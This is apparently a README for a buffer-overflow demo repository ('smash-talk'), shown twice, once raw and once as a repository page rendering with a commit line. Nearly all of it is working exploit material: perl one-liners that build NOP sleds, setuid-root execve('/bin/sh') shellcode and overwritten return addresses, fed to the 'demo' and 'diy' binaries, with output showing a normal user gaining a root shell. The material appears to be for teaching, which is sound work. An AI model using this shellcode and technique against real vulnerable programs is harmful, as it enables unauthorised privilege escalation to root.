smash-talk/README.md

## Demo

Make sure to point at the shellcode in the commandline, NOT the copied shellcode as that gets mangled. Or pad the shellcode with 20 bytes at the end and make the starter NOP-sled shorter.

```
atl.HA95-mHA95:wwouts_smash:/smash $ id
uid=48350(atl.HA95) gid=9999(ATLAS) groups=9999(ATLAS)
atl.HA95-mHA95:wwouts_smash:/smash $ ./demo `perl -e 'print "\x90"x91 . "\x6a\x17\x58\x31\xdb\xcd\x80\x6a\x2e\x58\x53\xcd\x80\x31\xd2\x6a\x0b\x58\x52\x68\x2f\x2f\x73\x68\x68\x2f\x62\x69\x6e\x89\xe3\x52\x53\x89\xe1\xcd\x80" ."XXXX". "\x30\xcb\xff\xff"'`
sh-4.4# id
uid=0(root) gid=0(root) groups=0(root),9999(ATLAS)
sh-4.4# exit
```

```
atl.HA95-mHA95:wwouts_smash:/smash $ ./demo `perl -e 'print "\x90"x75 . "\x6a\x17\x58\x31\xdb\xcd\x80\x6a\x2e\x58\x53\xcd\x80\x31\xd2\x6a\x0b\x58\x52\x68\x2f\x2f\x73\x68\x68\x2f\x62\x69\x6e\x89\xe3\x52\x53\x89\xe1\xcd\x80" . "X"x20 . "\x30\xcb\xff\xff"'`
```


## DIY

```
export BLAA=`perl -e 'print "\x90"x213 . "\x6a\x17\x58\x31\xdb\xcd\x80\x6a\x2e\x58\x53\xcd\x80\x31\xd2\x6a\x0b\x58\x52\x68\x2f\x2f\x73\x68\x68\x2f\x62\x69\x6e\x89\xe3\x52\x53\x89\xe1\xcd\x80"'`

gdb ./diy

atl.HA95-mHA95:wwouts_smash:/smash $ perl -e 'print "X"x250 . "" . "XXXX" . "\x24\xdc\xff\xff" . "CCCCDDDDEEEE\n";' >foo.txt
atl.HA95-mHA95:wwouts_smash:/smash $ cat foo.txt |./diy
What's your name?
Hello, XXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXX$▒▒▒CCCCDDDDEEEE
atl.HA95-mHA95:wwouts_smash:/smash $ (cat foo.txt;cat) |./diy
What's your name?
Hello, XXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXX$▒▒▒CCCCDDDDEEEE
ls
demo  diy  foo.txt  setup.sh  shellcode.txt  shellcode2.txt
id
uid=0(root) gid=0(root) groups=0(root),9999(ATLAS)


```

Test without the dodgy push EBX
atl.HA95-mHA95:wwouts_smash:/smash $ ./demo `perl -e 'print "\x90"x91 . "\x6a\x17\x58\x31\xdb\xcd\x80\x6a\x2e\x58\x90\xcd\x80\x31\xd2\x6a\x0b\x58\x52\x68\x2f\x2f\x73\x68\x68\x2f\x62\x69\x6e\x89\xe3\x52\x53\x89\xe1\xcd\x80" ."XXXX". "\xdc\xcd\xff\xff" . "\xdc\xcd\xff\xff" . "\xdc\xcd\xff\xff" . "BBBBCCCC"'`
minor improvements 2023-03-08 10:32:57 +01:00			`## Demo`

			`Make sure to point at the shellcode in the commandline, NOT the copied shellcode as that gets mangled. Or pad the shellcode with 20 bytes at the end and make the starter NOP-sled shorter.`

			```
			`atl.HA95-mHA95:wwouts_smash:/smash $ id`
			`uid=48350(atl.HA95) gid=9999(ATLAS) groups=9999(ATLAS)`
			atl.HA95-mHA95:wwouts_smash:/smash $ ./demo `perl -e 'print "\x90"x91 . "\x6a\x17\x58\x31\xdb\xcd\x80\x6a\x2e\x58\x53\xcd\x80\x31\xd2\x6a\x0b\x58\x52\x68\x2f\x2f\x73\x68\x68\x2f\x62\x69\x6e\x89\xe3\x52\x53\x89\xe1\xcd\x80" ."XXXX". "\x30\xcb\xff\xff"'`
			`sh-4.4# id`
			`uid=0(root) gid=0(root) groups=0(root),9999(ATLAS)`
			`sh-4.4# exit`
			```

			```
			atl.HA95-mHA95:wwouts_smash:/smash $ ./demo `perl -e 'print "\x90"x75 . "\x6a\x17\x58\x31\xdb\xcd\x80\x6a\x2e\x58\x53\xcd\x80\x31\xd2\x6a\x0b\x58\x52\x68\x2f\x2f\x73\x68\x68\x2f\x62\x69\x6e\x89\xe3\x52\x53\x89\xe1\xcd\x80" . "X"x20 . "\x30\xcb\xff\xff"'`
			```


			`## DIY`

			```
			export BLAA=`perl -e 'print "\x90"x213 . "\x6a\x17\x58\x31\xdb\xcd\x80\x6a\x2e\x58\x53\xcd\x80\x31\xd2\x6a\x0b\x58\x52\x68\x2f\x2f\x73\x68\x68\x2f\x62\x69\x6e\x89\xe3\x52\x53\x89\xe1\xcd\x80"'`

			`gdb ./diy`

			`atl.HA95-mHA95:wwouts_smash:/smash $ perl -e 'print "X"x250 . "" . "XXXX" . "\x24\xdc\xff\xff" . "CCCCDDDDEEEE\n";' >foo.txt`
			`atl.HA95-mHA95:wwouts_smash:/smash $ cat foo.txt \|./diy`
			`What's your name?`
			`Hello, XXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXX$▒▒▒CCCCDDDDEEEE`
			`atl.HA95-mHA95:wwouts_smash:/smash $ (cat foo.txt;cat) \|./diy`
			`What's your name?`
			`Hello, XXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXX$▒▒▒CCCCDDDDEEEE`
			`ls`
			`demo diy foo.txt setup.sh shellcode.txt shellcode2.txt`
			`id`
			`uid=0(root) gid=0(root) groups=0(root),9999(ATLAS)`


			```

			`Test without the dodgy push EBX`
			atl.HA95-mHA95:wwouts_smash:/smash $ ./demo `perl -e 'print "\x90"x91 . "\x6a\x17\x58\x31\xdb\xcd\x80\x6a\x2e\x58\x90\xcd\x80\x31\xd2\x6a\x0b\x58\x52\x68\x2f\x2f\x73\x68\x68\x2f\x62\x69\x6e\x89\xe3\x52\x53\x89\xe1\xcd\x80" ."XXXX". "\xdc\xcd\xff\xff" . "\xdc\xcd\xff\xff" . "\xdc\xcd\xff\xff" . "BBBBCCCC"'`